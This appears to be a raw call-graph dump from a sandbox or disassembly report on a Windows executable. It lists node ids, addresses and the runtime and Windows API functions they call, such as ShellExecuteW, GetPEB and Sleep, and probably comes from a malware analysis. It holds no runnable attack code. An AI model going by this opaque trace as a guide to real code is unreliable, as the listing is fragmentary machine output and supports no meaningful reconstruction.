86295->86308 86296->86283 86296->86293 86299 41395b 86296->86299 86297->86283 86303 413909 86297->86303 86305 419e30 46 API calls __mbstowcs_l_helper 86297->86305 86307 419e30 46 API calls __mbstowcs_l_helper 86299->86307 86303->86292 86303->86294 86304->86297 86305->86303 86306->86296 86307->86293 86308->86293 86309->86288 86310->86293 86311->86293 86313 419f13 86312->86313 86314 419f0e 86312->86314 86321 417f77 46 API calls __getptd_noexit 86313->86321 86314->86313 86317 419f2b 86314->86317 86316 419f18 86322 417f25 10 API calls __mbstowcs_l_helper 86316->86322 86319 40e454 86317->86319 86323 417f77 46 API calls __getptd_noexit 86317->86323 86319->86247 86321->86316 86322->86319 86323->86316 86325 403367 86324->86325 86326 403358 86324->86326 86327 4115d7 52 API calls 86325->86327 86326->86270 86328 403370 86327->86328 86329 4115d7 52 API calls 86328->86329 86330 40339e 86329->86330 86330->86270 86331->86278 86333 426daa 86332->86333 86334 40216b _wcslen 86332->86334 86354 40c600 86333->86354 86337 402180 86334->86337 86338 40219e 86334->86338 86336 426db5 86336->86279 86345 403bd0 86337->86345 86351 4013a0 86338->86351 86341 402187 _memmove 86341->86279 86343 426db7 86344 4115d7 52 API calls 86344->86341 86346 403bd8 86345->86346 86348 403bd9 moneypunct 86345->86348 86346->86341 86347 4268b9 86348->86347 86349 4115d7 52 API calls 86348->86349 86350 403c18 86349->86350 86350->86341 86352 4115d7 52 API calls 86351->86352 86353 4013a7 86352->86353 86353->86343 86353->86344 86355 40c619 86354->86355 86356 40c60a 86354->86356 86355->86336 86356->86355 86359 4026f0 86356->86359 86358 426d7a _memmove 86358->86336 86360 426873 86359->86360 86361 4026ff 86359->86361 86362 4013a0 52 API calls 86360->86362 86361->86358 86363 42687b 86362->86363 86364 4115d7 52 API calls 86363->86364 86365 42689e _memmove 86364->86365 86365->86358 86366 2f323b0 86380 2f30000 86366->86380 86368 2f32492 86383 2f322a0 86368->86383 86386 2f334c0 GetPEB 86380->86386 86382 2f3068b 86382->86368 86384 2f322a9 Sleep 86383->86384 86385 2f322b7 86384->86385 86387 2f334ea 86386->86387 86387->86382 86388 416454 86425 416c70 86388->86425 86390 416460 GetStartupInfoW 86391 416474 86390->86391 86426 419d5a HeapCreate 86391->86426 86393 4164cd 86394 4164d8 86393->86394 86509 41642b 46 API calls 3 library calls 86393->86509 86427 417c20 GetModuleHandleW 86394->86427 86397 4164de 86398 4164e9 __RTC_Initialize 86397->86398 86510 41642b 46 API calls 3 library calls 86397->86510 86446 41aaa1 GetStartupInfoW 86398->86446 86402 416503 GetCommandLineW 86459 41f584 GetEnvironmentStringsW 86402->86459 86405 416513 86465 41f4d6 GetModuleFileNameW 86405->86465 86408 41651d 86409 416528 86408->86409 86512 411924 46 API calls 3 library calls 86408->86512 86469 41f2a4 86409->86469 86412 41652e 86413 416539 86412->86413 86513 411924 46 API calls 3 library calls 86412->86513 86483 411703 86413->86483 86416 416541 86418 41654c __wwincmdln 86416->86418 86514 411924 46 API calls 3 library calls 86416->86514 86487 40d6b0 86418->86487 86421 41657c 86516 411906 46 API calls _doexit 86421->86516 86424 416581 __wfsopen 86425->86390 86426->86393 86428 417c34 86427->86428 86429 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86427->86429 86517 4178ff 49 API calls _free 86428->86517 86431 417c87 TlsAlloc 86429->86431 86434 417cd5 TlsSetValue 86431->86434 86435 417d96 86431->86435 86432 417c39 86432->86397 86434->86435 86436 417ce6 __init_pointers 86434->86436 86435->86397 86518 418151 InitializeCriticalSectionAndSpinCount 86436->86518 86438 417d91 86526 4178ff 49 API calls _free 86438->86526 86440 417d2a 86440->86438 86519 416b49 86440->86519 86443 417d76 86525 41793c 46 API calls 4 library calls 86443->86525 86445 417d7e GetCurrentThreadId 86445->86435 86447 416b49 __calloc_crt 46 API calls 86446->86447 86448 41aabf 86447->86448 86450 416b49 __calloc_crt 46 API calls 86448->86450 86453 41abb4 86448->86453 86454 4164f7 86448->86454 86455 41ac34 86448->86455 86449 41ac6a GetStdHandle 86449->86455 86450->86448 86451 41acce SetHandleCount 86451->86454 86452 41ac7c GetFileType 86452->86455 86453->86455 86456 41abe0 GetFileType 86453->86456 86457 41abeb InitializeCriticalSectionAndSpinCount 86453->86457 86454->86402 86511 411924 46 API calls 3 library calls 86454->86511 86455->86449 86455->86451 86455->86452 86458 41aca2 InitializeCriticalSectionAndSpinCount 86455->86458 86456->86453 86456->86457 86457->86453 86457->86454 86458->86454 86458->86455 86460 41f595 86459->86460 86461 41f599 86459->86461 86460->86405 86536 416b04 86461->86536 86463 41f5bb _memmove 86464 41f5c2 FreeEnvironmentStringsW 86463->86464 86464->86405 86466 41f50b _wparse_cmdline 86465->86466 86467 416b04 __malloc_crt 46 API calls 86466->86467 86468 41f54e _wparse_cmdline 86466->86468 86467->86468 86468->86408 86470 41f2bc _wcslen 86469->86470 86473 41f2b4 86469->86473 86471 416b49 __calloc_crt 46 API calls 86470->86471 86472 41f2e0 _wcslen 86471->86472 86472->86473 86474 41f336 86472->86474 86476 416b49 __calloc_crt 46 API calls 86472->86476 86477 41f35c 86472->86477 86480 41f373 86472->86480 86542 41ef12 46 API calls __mbstowcs_l_helper 86472->86542 86473->86412 86543 413748 86474->86543 86476->86472 86478 413748 _free 46 API calls 86477->86478 86478->86473 86549 417ed3 86480->86549 86482 41f37f 86482->86412 86484 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86483->86484 86486 411750 __IsNonwritableInCurrentImage 86484->86486 86568 41130a 51 API calls __cinit 86484->86568 86486->86416 86488 42e2f3 86487->86488 86489 40d6cc 86487->86489 86569 408f40 86489->86569 86491 40d707 86573 40ebb0 86491->86573 86496 40d737 86576 411951 86496->86576 86499 40d751 86588 40f4e0 SystemParametersInfoW SystemParametersInfoW 86499->86588 86501 40d75f 86589 40d590 GetCurrentDirectoryW 86501->86589 86503 40d767 SystemParametersInfoW 86504 40d78d 86503->86504 86505 408f40 VariantClear 86504->86505 86506 40d79d 86505->86506 86507 408f40 VariantClear 86506->86507 86508 40d7a6 86507->86508 86508->86421 86515 4118da 46 API calls _doexit 86508->86515 86509->86394 86510->86398 86515->86421 86516->86424 86517->86432 86518->86440 86521 416b52 86519->86521 86522 416b8f 86521->86522 86523 416b70 Sleep 86521->86523 86527 41f677 86521->86527 86522->86438 86522->86443 86524 416b85 86523->86524 86524->86521 86524->86522 86525->86445 86526->86435 86528 41f683 86527->86528 86529 41f69e _malloc 86527->86529 86528->86529 86530 41f68f 86528->86530 86531 41f6b1 HeapAlloc 86529->86531 86534 41f6d8 86529->86534 86535 417f77 46 API calls __getptd_noexit 86530->86535 86531->86529 86531->86534 86533 41f694 86533->86521 86534->86521 86535->86533 86539 416b0d 86536->86539 86537 4135bb _malloc 45 API calls 86537->86539 86538 416b43 86538->86463 86539->86537 86539->86538 86540 416b24 Sleep 86539->86540 86541 416b39 86540->86541 86541->86538 86541->86539 86542->86472 86544 41377c __dosmaperr 86543->86544 86545 413753 RtlFreeHeap 86543->86545 86544->86473 86545->86544 86546 413768 86545->86546 86552 417f77 46 API calls __getptd_noexit 86546->86552 86548 41376e GetLastError 86548->86544 86553 417daa 86549->86553 86552->86548 86554 417dc9 __cftof2_l __call_reportfault 86553->86554 86555 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86554->86555 86558 417eb5 __call_reportfault 86555->86558 86557 417ed1 GetCurrentProcess TerminateProcess 86557->86482 86559 41a208 86558->86559 86560 41a210 86559->86560 86561 41a212 IsDebuggerPresent 86559->86561 86560->86557 86567 41fe19 86561->86567 86564 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86565 421ff0 __call_reportfault 86564->86565 86566 421ff8 GetCurrentProcess TerminateProcess 86564->86566 86565->86566 86566->86557 86567->86564 86568->86486 86570 408f48 moneypunct 86569->86570 86571 4265c7 VariantClear 86570->86571 86572 408f55 moneypunct 86570->86572 86571->86572 86572->86491 86629 40ebd0 86573->86629 86633 4182cb 86576->86633 86578 41195e 86640 4181f2 LeaveCriticalSection 86578->86640 86580 40d748 86581 4119b0 86580->86581 86582 4119d6 86581->86582 86583 4119bc 86581->86583 86582->86499 86583->86582 86675 417f77 46 API calls __getptd_noexit 86583->86675 86585 4119c6 86676 417f25 10 API calls __mbstowcs_l_helper 86585->86676 86587 4119d1 86587->86499 86588->86501 86677 401f20 86589->86677 86591 40d5b6 IsDebuggerPresent 86592 40d5c4 86591->86592 86593 42e1bb MessageBoxA 86591->86593 86594 42e1d4 86592->86594 86595 40d5e3 86592->86595 86593->86594 86850 403a50 52 API calls 3 library calls 86594->86850 86747 40f520 86595->86747 86599 40d5fd GetFullPathNameW 86759 401460 86599->86759 86601 40d63b 86602 40d643 86601->86602 86603 42e231 SetCurrentDirectoryW 86601->86603 86604 40d64c 86602->86604 86851 432fee 6 API calls 86602->86851 86603->86602 86774 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86604->86774 86607 42e252 86607->86604 86609 42e25a GetModuleFileNameW 86607->86609 86611 42e274 86609->86611 86612 42e2cb GetForegroundWindow ShellExecuteW 86609->86612 86852 401b10 86611->86852 86614 40d688 86612->86614 86613 40d656 86616 40d669 86613->86616 86848 40e0c0 74 API calls __cftof2_l 86613->86848 86621 40d692 SetCurrentDirectoryW 86614->86621 86782 4091e0 86616->86782 86621->86503 86623 42e28d 86859 40d200 52 API calls 2 library calls 86623->86859 86626 42e299 GetForegroundWindow ShellExecuteW 86627 42e2c6 86626->86627 86627->86614 86628 40ec00 LoadLibraryA GetProcAddress 86628->86496 86630 40d72e 86629->86630 86631 40ebd6 LoadLibraryA 86629->86631 86630->86496 86630->86628 86631->86630 86632 40ebe7 GetProcAddress 86631->86632 86632->86630 86634 4182e0 86633->86634 86635 4182f3 EnterCriticalSection 86633->86635 86641 418209 86634->86641 86635->86578 86637 4182e6 86637->86635 86668 411924 46 API calls 3 library calls 86637->86668 86640->86580 86642 418215 __wfsopen 86641->86642 86643 418225 86642->86643 86644 41823d 86642->86644 86669 418901 46 API calls 2 library calls 86643->86669 86646 41824b __wfsopen 86644->86646 86647 416b04 __malloc_crt 45 API calls 86644->86647 86646->86637 86649 418256 86647->86649 86648 41822a 86670 418752 46 API calls 8 library calls 86648->86670 86651 41825d 86649->86651 86652 41826c 86649->86652 86672 417f77 46 API calls __getptd_noexit 86651->86672 86655 4182cb __lock 45 API calls 86652->86655 86653 418231 86671 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86653->86671 86658 418273 86655->86658 86659 4182a6 86658->86659 86660 41827b InitializeCriticalSectionAndSpinCount 86658->86660 86661 413748 _free 45 API calls 86659->86661 86662 418297 86660->86662 86663 41828b 86660->86663 86661->86662 86674 4182c2 LeaveCriticalSection _doexit 86662->86674 86664 413748 _free 45 API calls 86663->86664 86666 418291 86664->86666 86673 417f77 46 API calls __getptd_noexit 86666->86673 86669->86648 86670->86653 86672->86646 86673->86662 86674->86646 86675->86585 86676->86587 86860 40e6e0 86677->86860 86681 401f41 GetModuleFileNameW 86878 410100 86681->86878 86683 401f5c 86890 410960 86683->86890 86686 401b10 52 API calls 86687 401f81 86686->86687 86893 401980 86687->86893 86689 401f8e 86690 408f40 VariantClear 86689->86690 86691 401f9d 86690->86691 86692 401b10 52 API calls 86691->86692 86693 401fb4 86692->86693 86694 401980 53 API calls 86693->86694 86695 401fc3 86694->86695 86696 401b10 52 API calls 86695->86696 86697 401fd2 86696->86697 86901 40c2c0 86697->86901 86699 401fe1 86700 40bc70 52 API calls 86699->86700 86701 401ff3 86700->86701 86919 401a10 86701->86919 86703 401ffe 86926 4114ab 86703->86926 86706 428b05 86708 401a10 52 API calls 86706->86708 86707 402017 86709 4114ab __wcsicoll 58 API calls 86707->86709 86710 428b18 86708->86710 86711 402022 86709->86711 86713 401a10 52 API calls 86710->86713 86711->86710 86712 40202d 86711->86712 86714 4114ab __wcsicoll 58 API calls 86712->86714 86715 428b33 86713->86715 86716 402038 86714->86716 86718 428b3b GetModuleFileNameW 86715->86718 86717 402043 86716->86717 86716->86718 86719 4114ab __wcsicoll 58 API calls 86717->86719 86720 401a10 52 API calls 86718->86720 86721 40204e 86719->86721 86722 428b6c 86720->86722 86726 401a10 52 API calls 86721->86726 86731 428b90 _wcscpy 86721->86731 86739 402092 86721->86739 86723 40e0a0 52 API calls 86722->86723 86724 428b7a 86723->86724 86727 401a10 52 API calls 86724->86727 86725 4020a3 86728 428bc6 86725->86728 86934 40e830 53 API calls 86725->86934 86729 402073 _wcscpy 86726->86729 86730 428b88 86727->86730 86737 401a10 52 API calls 86729->86737 86730->86731 86734 401a10 52 API calls 86731->86734 86733 4020bb 86935 40cf00 53 API calls 86733->86935 86742 4020d0 86734->86742 86736 4020c6 86738 408f40 VariantClear 86736->86738 86737->86739 86738->86742 86739->86725 86739->86731 86740 402110 86744 408f40 VariantClear 86740->86744 86742->86740 86745 401a10 52 API calls 86742->86745 86936 40cf00 53 API calls 86742->86936 86937 40e6a0 53 API calls 86742->86937 86746 402120 moneypunct 86744->86746 86745->86742 86746->86591 86748 4295c9 __cftof2_l 86747->86748 86749 40f53c 86747->86749 86751 4295d9 GetOpenFileNameW 86748->86751 87766 410120 86749->87766 86751->86749 86753 40d5f5 86751->86753 86752 40f545 87770 4102b0 SHGetMalloc 86752->87770 86753->86599 86753->86601 86755 40f54c 87775 410190 GetFullPathNameW 86755->87775 86757 40f559 87786 40f570 86757->87786 87840 402400 86759->87840 86761 40146f 86762 428c29 _wcscat 86761->86762 87849 401500 86761->87849 86764 40147c 86764->86762 87857 40d440 86764->87857 86766 401489 86766->86762 86767 401491 GetFullPathNameW 86766->86767 86768 402160 52 API calls 86767->86768 86769 4014bb 86768->86769 86770 402160 52 API calls 86769->86770 86771 4014c8 86770->86771 86771->86762 86772 402160 52 API calls 86771->86772 86773 4014ee 86772->86773 86773->86601 86775 428361 86774->86775 86776 4103fc LoadImageW RegisterClassExW 86774->86776 87927 44395e EnumResourceNamesW LoadImageW 86775->87927 87926 410490 7 API calls 86776->87926 86779 428368 86780 40d651 86781 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86780->86781 86781->86613 86783 409202 86782->86783 86784 42d7ad 86782->86784 86820 409216 moneypunct 86783->86820 88064 410940 381 API calls 86783->88064 88067 45e737 90 API calls 3 library calls 86784->88067 86787 409386 86788 40939c 86787->86788 88065 40f190 10 API calls 86787->88065 86788->86614 86849 401000 Shell_NotifyIconW __cftof2_l 86788->86849 86790 4095b2 86790->86788 86792 4095bf 86790->86792 86791 409253 PeekMessageW 86791->86820 88066 401a50 381 API calls 86792->88066 86794 42d8cd Sleep 86794->86820 86795 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86795->86788 86798 4095f9 86795->86798 86797 42e13b 88085 40d410 VariantClear 86797->88085 86801 42e158 TranslateMessage DispatchMessageW GetMessageW 86798->86801 86801->86801 86802 42e188 86801->86802 86802->86788 86804 409567 PeekMessageW 86804->86820 86806 44c29d 52 API calls 86817 4094e0 86806->86817 86807 46f3c1 107 API calls 86807->86820 86808 40e0a0 52 API calls 86808->86820 86809 46fdbf 108 API calls 86809->86817 86810 409551 TranslateMessage DispatchMessageW 86810->86804 86812 42dcd2 WaitForSingleObject 86814 42dcf0 GetExitCodeProcess CloseHandle 86812->86814 86812->86820 86813 42dd3d Sleep 86813->86817 88074 40d410 VariantClear 86814->88074 86817->86806 86817->86809 86817->86820 86822 408f40 VariantClear 86817->86822 86826 40c620 timeGetTime 86817->86826 86829 465124 53 API calls 86817->86829 86830 42dd89 CloseHandle 86817->86830 86833 42de19 GetExitCodeProcess CloseHandle 86817->86833 86835 401b10 52 API calls 86817->86835 86837 42de88 Sleep 86817->86837 86846 401980 53 API calls 86817->86846 88071 45178a 54 API calls 86817->88071 88072 47d33e 381 API calls 86817->88072 88073 453bc6 54 API calls 86817->88073 88075 40d410 VariantClear 86817->88075 88076 443d19 67 API calls _wcslen 86817->88076 88077 4574b4 VariantClear 86817->88077 88078 403cd0 86817->88078 88082 4731e1 VariantClear 86817->88082 88083 4331a2 6 API calls 86817->88083 86819 4094cf Sleep 86819->86817 86820->86787 86820->86791 86820->86794 86820->86797 86820->86804 86820->86807 86820->86808 86820->86810 86820->86812 86820->86813 86820->86817 86820->86819 86821 40d410 VariantClear 86820->86821 86824 42d94d timeGetTime 86820->86824 86831 47d33e 359 API calls 86820->86831 86842 42e0cc VariantClear 86820->86842 86843 408f40 VariantClear 86820->86843 86844 45e737 90 API calls 86820->86844 87928 4091b0 86820->87928 87986 40afa0 86820->87986 88012 408fc0 86820->88012 88047 408cc0 86820->88047 88061 4096a0 381 API calls 4 library calls 86820->88061 88062 40d150 TranslateAcceleratorW 86820->88062 88063 40d170 IsDialogMessageW GetClassLongW 86820->88063 88068 465124 53 API calls 86820->88068 88069 40c620 timeGetTime 86820->88069 88084 40e270 VariantClear moneypunct 86820->88084 86821->86820 86822->86817 88070 465124 53 API calls 86824->88070 86826->86817 86829->86817 86830->86817 86831->86820 86833->86817 86835->86817 86837->86820 86842->86820 86843->86820 86844->86820 86846->86817 86848->86616 86849->86614 86850->86601 86851->86607 86853 401b16 _wcslen 86852->86853 86854 4115d7 52 API calls 86853->86854 86855 401b63 86853->86855 86856 401b4b _memmove 86854->86856 86858 40d200 52 API calls 2 library calls 86855->86858 86857 4115d7 52 API calls 86856->86857 86857->86855 86858->86623 86859->86626 86861 40bc70 52 API calls 86860->86861 86862 401f31 86861->86862 86863 402560 86862->86863 86864 40256d __write_nolock 86863->86864 86865 402160 52 API calls 86864->86865 86867 402593 86865->86867 86877 4025bd 86867->86877 86938 401c90 86867->86938 86868 4026f0 52 API calls 86868->86877 86869 4026a7 86870 401b10 52 API calls 86869->86870 86876 4026db 86869->86876 86872 4026d1 86870->86872 86871 401b10 52 API calls 86871->86877 86942 40d7c0 52 API calls 2 library calls 86872->86942 86874 401c90 52 API calls 86874->86877 86876->86681 86877->86868 86877->86869 86877->86871 86877->86874 86941 40d7c0 52 API calls 2 library calls 86877->86941 86943 40f760 86878->86943 86881 410118 86881->86683 86883 42805d 86884 42806a 86883->86884 86999 431e58 86883->86999 86886 413748 _free 46 API calls 86884->86886 86887 428078 86886->86887 86888 431e58 82 API calls 86887->86888 86889 428084 86888->86889 86889->86683 86891 4115d7 52 API calls 86890->86891 86892 401f74 86891->86892 86892->86686 86894 4019a3 86893->86894 86895 401985 86893->86895 86894->86895 86896 4019b8 86894->86896 86897 40199f 86895->86897 87754 403e10 53 API calls 86895->87754 87755 403e10 53 API calls 86896->87755 86897->86689 86900 4019c4 86900->86689 86902 40c2c7 86901->86902 86903 40c30e 86901->86903 86906 40c2d3 86902->86906 86907 426c79 86902->86907 86904 40c315 86903->86904 86905 426c2b 86903->86905 86911 40c321 86904->86911 86912 426c5a 86904->86912 86909 426c4b 86905->86909 86910 426c2e 86905->86910 87756 403ea0 52 API calls __cinit 86906->87756 87761 4534e3 52 API calls 86907->87761 87759 4534e3 52 API calls 86909->87759 86917 40c2de 86910->86917 87758 4534e3 52 API calls 86910->87758 87757 403ea0 52 API calls __cinit 86911->87757 87760 4534e3 52 API calls 86912->87760 86917->86699 86920 401a30 86919->86920 86921 401a17 86919->86921 86923 402160 52 API calls 86920->86923 86922 401a2d 86921->86922 87762 403c30 52 API calls _memmove 86921->87762 86922->86703 86925 401a3d 86923->86925 86925->86703 86927 411523 86926->86927 86928 4114ba 86926->86928 87765 4113a8 58 API calls 3 library calls 86927->87765 86933 40200c 86928->86933 87763 417f77 46 API calls __getptd_noexit 86928->87763 86931 4114c6 87764 417f25 10 API calls __mbstowcs_l_helper 86931->87764 86933->86706 86933->86707 86934->86733 86935->86736 86936->86742 86937->86742 86939 4026f0 52 API calls 86938->86939 86940 401c97 86939->86940 86940->86867 86941->86877 86942->86876 87003 40f6f0 86943->87003 86945 40f77b _strcat moneypunct 87011 40f850 86945->87011 86950 427c2a 87040 414d04 86950->87040 86952 40f7fc 86952->86950 86954 40f804 86952->86954 87027 414a46 86954->87027 86957 40f80e 86957->86881 86962 4528bd 86957->86962 86959 427c59 87046 414fe2 86959->87046 86961 427c79 86963 4150d1 _fseek 81 API calls 86962->86963 86964 452930 86963->86964 87679 452719 86964->87679 86967 452948 86967->86883 86968 414d04 __fread_nolock 61 API calls 86969 452966 86968->86969 86970 414d04 __fread_nolock 61 API calls 86969->86970 86971 452976 86970->86971 86972 414d04 __fread_nolock 61 API calls 86971->86972 86973 45298f 86972->86973 86974 414d04 __fread_nolock 61 API calls 86973->86974 86975 4529aa 86974->86975 86976 4150d1 _fseek 81 API calls 86975->86976 86977 4529c4 86976->86977 86978 4135bb _malloc 46 API calls 86977->86978 86979 4529cf 86978->86979 86980 4135bb _malloc 46 API calls 86979->86980 86981 4529db 86980->86981 86982 414d04 __fread_nolock 61 API calls 86981->86982 86983 4529ec 86982->86983 86984 44afef GetSystemTimeAsFileTime 86983->86984 86985 452a00 86984->86985 86986 452a36 86985->86986 86987 452a13 86985->86987 86988 452aa5 86986->86988 86989 452a3c 86986->86989 86990 413748 _free 46 API calls 86987->86990 86993 413748 _free 46 API calls 86988->86993 87685 44b1a9 86989->87685 86991 452a1c 86990->86991 86994 413748 _free 46 API calls 86991->86994 86998 452aa3 86993->86998 86996 452a25 86994->86996 86995 452a9d 86997 413748 _free 46 API calls 86995->86997 86996->86883 86997->86998 86998->86883 87000 431e64 86999->87000 87001 431e6a 86999->87001 87002 414a46 __fcloseall 82 API calls 87000->87002 87001->86884 87002->87001 87004 425de2 87003->87004 87006 40f6fc _wcslen 87003->87006 87004->86945 87005 40f710 WideCharToMultiByte 87007 40f756 87005->87007 87008 40f728 87005->87008 87006->87005 87007->86945 87009 4115d7 52 API calls 87008->87009 87010 40f735 WideCharToMultiByte 87009->87010 87010->86945 87012 40f85d __cftof2_l _strlen 87011->87012 87014 40f7ab 87012->87014 87059 414db8 87012->87059 87015 4149c2 87014->87015 87230 414904 87015->87230 87017 40f7e9 87017->86950 87018 40f5c0 87017->87018 87019 40f5cd _strcat __write_nolock _memmove 87018->87019 87020 414d04 __fread_nolock 61 API calls 87019->87020 87021 40f691 __tzset_nolock 87019->87021 87023 425d11 87019->87023 87318 4150d1 87019->87318 87020->87019 87021->86952 87024 4150d1 _fseek 81 API calls 87023->87024 87025 425d33 87024->87025 87026 414d04 __fread_nolock 61 API calls 87025->87026 87026->87021 87028 414a52 __wfsopen 87027->87028 87029 414a64 87028->87029 87030 414a79 87028->87030 87438 417f77 46 API calls __getptd_noexit 87029->87438 87033 415471 __lock_file 47 API calls 87030->87033 87037 414a74 __wfsopen 87030->87037 87032 414a69 87439 417f25 10 API calls __mbstowcs_l_helper 87032->87439 87035 414a92 87033->87035 87422 4149d9 87035->87422 87037->86957 87507 414c76 87040->87507 87042 414d1c 87043 44afef 87042->87043 87672 442c5a 87043->87672 87045 44b00d 87045->86959 87047 414fee __wfsopen 87046->87047 87048 414ffa 87047->87048 87049 41500f 87047->87049 87676 417f77 46 API calls __getptd_noexit 87048->87676 87051 415471 __lock_file 47 API calls 87049->87051 87053 415017 87051->87053 87052 414fff 87677 417f25 10 API calls __mbstowcs_l_helper 87052->87677 87055 414e4e __ftell_nolock 51 API calls 87053->87055 87056 415024 87055->87056 87678 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 87056->87678 87058 41500a __wfsopen 87058->86961 87060 414dd6 87059->87060 87061 414deb 87059->87061 87070 417f77 46 API calls __getptd_noexit 87060->87070 87061->87060 87063 414df2 87061->87063 87072 41b91b 79 API calls 11 library calls 87063->87072 87064 414ddb 87071 417f25 10 API calls __mbstowcs_l_helper 87064->87071 87067 414e18 87068 414de6 87067->87068 87073 418f98 87067->87073 87068->87012 87070->87064 87071->87068 87072->87067 87094 414139 87073->87094 87075 418fa8 87076 418fb3 87075->87076 87077 418fca 87075->87077 87104 417f77 46 API calls __getptd_noexit 87076->87104 87078 418fce 87077->87078 87088 418fdb __flsbuf 87077->87088 87105 417f77 46 API calls __getptd_noexit 87078->87105 87081 41903c 87082 4190cb 87081->87082 87083 41904b 87081->87083 87084 41b7b2 __write 77 API calls 87082->87084 87085 419062 87083->87085 87091 41907f 87083->87091 87087 418fb8 87084->87087 87115 41b7b2 87085->87115 87087->87068 87088->87081 87088->87087 87090 419031 87088->87090 87106 42064c 87088->87106 87090->87081 87101 420603 87090->87101 87091->87087 87140 420519 51 API calls 6 library calls 87091->87140 87095 414145 87094->87095 87096 41415a 87094->87096 87141 417f77 46 API calls __getptd_noexit 87095->87141 87096->87075 87098 41414a 87142 417f25 10 API calls __mbstowcs_l_helper 87098->87142 87100 414155 87100->87075 87102 416b04 __malloc_crt 46 API calls 87101->87102 87103 420618 87102->87103 87103->87081 87104->87087 87105->87087 87107 420668 87106->87107 87108 420659 87106->87108 87111 420686 87107->87111 87144 417f77 46 API calls __getptd_noexit 87107->87144 87143 417f77 46 API calls __getptd_noexit 87108->87143 87110 42065e 87110->87090 87111->87090 87113 420679 87145 417f25 10 API calls __mbstowcs_l_helper 87113->87145 87116 41b7be __wfsopen 87115->87116 87117 41b7e1 87116->87117 87118 41b7c6 87116->87118 87120 41b7ed 87117->87120 87123 41b827 87117->87123 87222 417f8a 46 API calls __getptd_noexit 87118->87222 87224 417f8a 46 API calls __getptd_noexit 87120->87224 87121 41b7cb 87223 417f77 46 API calls __getptd_noexit 87121->87223 87146 41ae56 87123->87146 87125 41b7f2 87225 417f77 46 API calls __getptd_noexit 87125->87225 87128 41b7fa 87226 417f25 10 API calls __mbstowcs_l_helper 87128->87226 87129 41b82d 87131 41b83b 87129->87131 87132 41b84f 87129->87132 87156 41b0b5 87131->87156 87227 417f77 46 API calls __getptd_noexit 87132->87227 87133 41b7d3 __wfsopen 87133->87087 87136 41b847 87229 41b87e LeaveCriticalSection __unlock_fhandle 87136->87229 87137 41b854 87228 417f8a 46 API calls __getptd_noexit 87137->87228 87140->87087 87141->87098 87142->87100 87143->87110 87144->87113 87145->87110 87147 41ae62 __wfsopen 87146->87147 87148 41aebc 87147->87148 87149 4182cb __lock 46 API calls 87147->87149 87150 41aec1 EnterCriticalSection 87148->87150 87151 41aede __wfsopen 87148->87151 87152 41ae8e 87149->87152 87150->87151 87151->87129 87153 41aeaa 87152->87153 87154 41ae97 InitializeCriticalSectionAndSpinCount 87152->87154 87155 41aeec ___lock_fhandle LeaveCriticalSection 87153->87155 87154->87153 87155->87148 87157 41b0c4 __write_nolock 87156->87157 87158 41b119 87157->87158 87159 41b0fa 87157->87159 87192 41b0ef 87157->87192 87162 41b175 87158->87162 87163 41b158 87158->87163 87160 417f8a __write_nolock 46 API calls 87159->87160 87164 41b0ff 87160->87164 87161 41a208 __write_nolock 5 API calls 87165 41b7b0 87161->87165 87167 41b18b 87162->87167 87168 41b17c 87162->87168 87166 417f8a __write_nolock 46 API calls 87163->87166 87169 417f77 __mbstowcs_l_helper 46 API calls 87164->87169 87165->87136 87170 41b15d 87166->87170 87173 42064c __write_nolock 46 API calls 87167->87173 87171 420494 __lseeki64_nolock 48 API calls 87168->87171 87172 41b106 87169->87172 87174 417f77 __mbstowcs_l_helper 46 API calls 87170->87174 87175 41b188 87171->87175 87176 417f25 __mbstowcs_l_helper 10 API calls 87172->87176 87177 41b191 87173->87177 87178 41b165 87174->87178 87175->87167 87176->87192 87179 41b433 87177->87179 87181 417a69 __getptd 46 API calls 87177->87181 87180 417f25 __mbstowcs_l_helper 10 API calls 87178->87180 87182 41b6e3 WriteFile 87179->87182 87183 41b442 87179->87183 87180->87192 87185 41b1ac GetConsoleMode 87181->87185 87186 41b716 GetLastError 87182->87186 87216 41b415 87182->87216 87184 41b4fd 87183->87184 87193 41b455 87183->87193 87189 41b5d7 87184->87189 87190 41b50a 87184->87190 87185->87179 87188 41b1d5 87185->87188 87186->87216 87187 41b761 87187->87192 87195 417f77 __mbstowcs_l_helper 46 API calls 87187->87195 87188->87179 87191 41b1e5 GetConsoleCP 87188->87191 87189->87187 87199 41b648 WideCharToMultiByte 87189->87199 87190->87187 87202 41b579 WriteFile 87190->87202 87191->87216 87219 41b208 87191->87219 87192->87161 87193->87187 87194 41b49f WriteFile 87193->87194 87194->87186 87198 41b4d3 87194->87198 87197 41b784 87195->87197 87196 41b734 87200 41b753 87196->87200 87201 41b73f 87196->87201 87203 417f8a __write_nolock 46 API calls 87197->87203 87198->87193 87208 41b4f8 87198->87208 87198->87216 87199->87186 87205 41b67f WriteFile 87199->87205 87206 417f9d __dosmaperr 46 API calls 87200->87206 87204 417f77 __mbstowcs_l_helper 46 API calls 87201->87204 87202->87186 87207 41b5ad 87202->87207 87203->87192 87209 41b744 87204->87209 87210 41b6b6 GetLastError 87205->87210 87213 41b6aa 87205->87213 87206->87192 87207->87190 87207->87208 87207->87216 87208->87216 87212 417f8a __write_nolock 46 API calls 87209->87212 87210->87213 87211 4131e9 __write_nolock 56 API calls 87211->87219 87212->87192 87213->87189 87213->87205 87213->87208 87213->87216 87214 420955 58 API calls __fassign 87214->87219 87215 41b2b4 WideCharToMultiByte 87215->87216 87217 41b2e5 WriteFile 87215->87217 87216->87187 87216->87192 87216->87196 87217->87186 87218 41b30c 87217->87218 87218->87186 87218->87216 87218->87219 87220 4221f0 WriteConsoleW CreateFileW __write_nolock 87218->87220 87221 41b339 WriteFile 87218->87221 87219->87211 87219->87214 87219->87215 87219->87216 87219->87218 87220->87218 87221->87186 87221->87218 87222->87121 87223->87133 87224->87125 87225->87128 87226->87133 87227->87137 87228->87136 87229->87133 87233 414910 __wfsopen 87230->87233 87231 414923 87286 417f77 46 API calls __getptd_noexit 87231->87286 87233->87231 87235 414951 87233->87235 87234 414928 87287 417f25 10 